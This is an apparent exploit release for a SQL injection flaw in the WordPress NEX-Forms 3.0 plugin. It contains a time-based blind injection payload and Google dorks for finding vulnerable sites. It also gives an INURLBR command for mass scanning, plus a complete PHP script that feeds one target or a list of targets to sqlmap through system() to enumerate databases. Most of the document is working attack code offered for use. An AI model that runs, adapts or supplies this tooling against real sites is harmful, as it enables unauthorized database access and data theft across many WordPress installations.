WordPress NEX-Forms 3.0 SQL Injection

` # AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL  
# Exploit name: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL  
Injection Vulnerability  
# Type: SQL Injection  
# Email: [email protected]  
# Blog: http://blog.inurl.com.br  
# Twitter: https://twitter.com/googleinurl  
# Fanpage: https://fb.com/InurlBrasil  
# Pastebin http://pastebin.com/u/Googleinurl  
# GIT: https://github.com/googleinurl  
# PSS: http://packetstormsecurity.com/user/googleinurl  
# YOUTUBE: http://youtube.com/c/INURLBrasil  
# PLUS: http://google.com/+INURLBrasil  
# Who Discovered  
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli  
# Vulnerability discovered by: Claudio Viviani  
  
  
  
# VENTOR  
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/  
  
# Vulnerability Description  
The "submit_nex_form" ajax function is affected from SQL Injection  
vulnerability  
  
# Tool Description  
Automation script explores targets with the help of SqlMap tool Execute  
command SqlMap  
  
{$params['folder']} -u  
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'  
--technique=B -p nex_forms_Id --dbms mysql {$params['proxy']}  
--random-agent  
--answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1  
  
# GET VULN  
SQL can be injected in the following GET  
  
GET VULN: nex_forms_Id=(id)  
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])  
Ex:  
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1  
  
# XPL inject DBMS: 'MySQL'  
  
Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)  
- GOOGLE DORK  
  
inurl:nex-forms-express-wp-form-builder  
index of nex-forms-express-wp-form-builde  
# COMMAND --help:  
  
-t : SET TARGET.  
-f : SET FILE TARGETS.  
-p : SET PROXY  
Execute:  
php wp3xplo1t.php -t target  
php wp3xplo1t.php -f targets.txt  
php wp3xplo1t.php -t target -p 'http://localhost:9090'  
  
# EXPLOIT MASS USE SCANNER INURLBR  
  
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s  
wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"  
# DOWNLOAD INURLBR  
  
https://github.com/googleinurl/SCANNER-INURLBR  
  
# REFERENCE  
[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli  
  
EXPLOIT CODE:  
  
<?php  
  
/*  
[ I N U R L - B R A S I L ] - [ By GoogleINURL ]  
  
-----------------------------------------------------------------------------  
  
# AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL  
# Email: [email protected]  
# Blog: http://blog.inurl.com.br  
# Twitter: https://twitter.com/googleinurl  
# Fanpage: https://fb.com/InurlBrasil  
# Pastebin http://pastebin.com/u/Googleinurl  
# GIT: https://github.com/googleinurl  
# PSS: http://packetstormsecurity.com/user/googleinurl  
# YOUTUBE: http://youtube.com/c/INURLBrasil  
# PLUS: http://google.com/+INURLBrasil  
  
# Who Discovered  
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli  
# Vulnerability discovered by: Claudio Viviani  
  
-----------------------------------------------------------------------------  
  
# EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL  
Injection Vulnerability / INURL BRASIL  
# VENTOR:  
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/  
# Dork Google: inurl:nex-forms-express-wp-form-builder  
# Dork Google: index of nex-forms-express-wp-form-builde  
# GET VULN: nex_forms_Id=(id)  
# $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])  
  
-----------------------------------------------------------------------------  
  
# DBMS: 'MySQL'  
# Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)  
  
  
-----------------------------------------------------------------------------  
  
# Info: The "submit_nex_form" ajax function is affected from SQL  
Injection vulnerability  
# POC:  
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit  
  
-----------------------------------------------------------------------------  
  
# --help:  
-t : SET TARGET.  
-f : SET FILE TARGETS.  
-p : SET PROXY  
Execute:  
php wp3xplo1t.php -t target  
php wp3xplo1t.php -f targets.txt  
php wp3xplo1t.php -t target -p 'http://localhost:9090'  
  
-----------------------------------------------------------------------------  
  
# EXPLOIT MASS USE SCANNER INURLBR  
# COMMAND: ./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder'  
-s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"  
# DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR  
  
-----------------------------------------------------------------------------  
INFO:  
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/  
*/  
  
  
error_reporting(1);  
set_time_limit(0);  
ini_set('display_errors', 1);  
ini_set('max_execution_time', 0);  
ini_set('allow_url_fopen', 1);  
$folder_SqlMap = "sqlmap"; // set the folder! ex: python  
../../sqlmap/sqlmap.py  
$op_ = getopt('f:t:p:', array('help::'));  
echo "  
\t\t\t\t _____  
\t\t\t\t (_____) ____ _ _ _ _ _____ _ ____  
_ _  
\t\t\t\t (() ()) |_ _| \ | | | | | __ \| | | _ \  
(_) |  
\t\t\t\t \ / | | | \| | | | | |__) | | ______ | |_) |_ __  
__ _ ___ _| |  
\t\t\t\t \ / | | | . ` | | | | _ /| | |______| | _ <| '__/  
_` / __| | |  
\t\t\t\t /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | |  
(_| \__ \ | |  
\t\t\t\t [___] |_____|_| \_|\____/|_| \_\______| |____/|_|  
\__,_|___/_|_|  
\t\t\t\t\033[1;37m0xNeither war between hackers, nor peace for the system.\n  
\t\t\t\t[+] [Exploit]: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL  
Injection Vulnerability / INURL BRASIL\n\t\t\t\t[+] [help]:  
--help\033[0m\n\n";  
$menu = "  
\t\t\t\t -t : SET TARGET.  
\t\t\t\t -f : SET FILE TARGETS.  
\t\t\t\t -p : SET PROXY  
\t\t\t\t Execute:  
\t\t\t\t php wp3xplo1t.php -t target  
\t\t\t\t php wp3xplo1t.php -f targets.txt  
\t\t\t\t php wp3xplo1t.php -t target -p '  
http://localhost:9090'  
\n";  
echo isset($op_['help']) ? exit($menu) : NULL;  
  
$params = array(  
'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ?  
$op_['t'] : "http://{$op_['t']}") : NULL,  
'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ?  
$op_['f'] : NULL,  
'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL,  
'folder' => $folder_SqlMap,  
'line' =>  
"\t\t\t\t--------------------------------------------------------------------------------------------------------"  
);  
  
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ?  
exit("\t\t\t\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;  
not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL;  
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;  
  
function not_isnull_empty($valor = NULL) {  
RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;  
}  
  
function __plus() {  
ob_flush();  
flush();  
}  
  
function __listTarget($file) {  
$tgt_ = array_unique(array_filter(explode("\n",  
file_get_contents($file['file']))));  
echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS  
LOADED : " . count($tgt_) . "\033[0m\n";  
foreach ($tgt_ as $url) {  
echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING :  
{$url} \033[0m\n";  
__plus();  
$file['target'] = $url;  
__exec($file) . __plus();  
}  
}  
  
function __exec($params) {  
__plus();  
echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO]  
starting SqlMap...\n";  
echo "[+] [" . date("H:i:s") . "] [INFO] TARGET:  
{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id={SQL-INJECTION}\033[0m\n";  
$command = "{$params['folder']} -u  
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'  
"  
. " -p nex_forms_Id --dbms mysql {$params['proxy']}  
--random-agent "  
. " --answers='follow=N' --dbs --batch --time-sec 10 --level 2  
--risk 1";  
system($command, $dados);  
__plus();  
exit(0);  
}  
`